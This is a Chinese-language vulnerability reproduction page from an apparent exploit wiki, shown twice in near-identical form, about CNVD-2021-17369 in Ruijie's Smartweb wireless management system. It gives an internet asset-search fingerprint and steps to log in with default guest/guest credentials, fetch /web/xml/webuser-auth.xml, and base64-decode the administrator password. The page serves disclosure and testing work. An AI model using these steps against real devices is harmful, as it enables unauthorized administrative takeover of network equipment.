fofamini-wiki

登录白背景

源码

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369

一、漏洞简介
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。
二、影响版本
锐捷网络股份有限公司无线smartweb管理系统
三、资产测绘
●hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif"
●登录页面

四、漏洞复现
使用默认口令guest/guest登录系统

之后访问

/web/xml/webuser-auth.xml

base64解码解密后登录admin权限后台

原文: https://www.yuque.com/xiaokp7/ocvun2/cg198cbfykmz8637

# 锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369

**一、漏洞简介** 
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞，攻击者可从漏洞获取到管理员账号密码，从而以管理员权限登录。 
**二、影响版本** 
锐捷网络股份有限公司 无线smartweb管理系统 
**三、资产测绘** 
●hunterweb.body="img/free_login_ge.gif"&&web.body="./img/login_bg.gif" 
●登录页面

![1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387.png](./img/-3rJ7WzmMGCuOLN8/1693030700475-392f4913-2fd5-45e8-a33b-c5eb742be387-470359.webp)

**四、漏洞复现** 
使用默认口令guest/guest登录系统

![1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567.png](./img/-3rJ7WzmMGCuOLN8/1710772684782-0092c42f-f067-4e1b-a3ec-8f0c2ecd4567-860764.png)

之后访问

```java
/web/xml/webuser-auth.xml
```

![1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9.png](./img/-3rJ7WzmMGCuOLN8/1710772700000-43f9f7d1-b323-4efa-b957-c54795239ba9-168258.png)

base64解码解密后登录admin权限后台

![1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b.png](./img/-3rJ7WzmMGCuOLN8/1710772786397-1c7129d9-d939-4185-83df-ffdd78bd226b-522218.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cg198cbfykmz8637>

fofamini-wiki

锐捷Smartweb管理系统 密码信息泄露漏洞 CNVD-2021-17369

锐捷Smartweb管理系统密码信息泄露漏洞 CNVD-2021-17369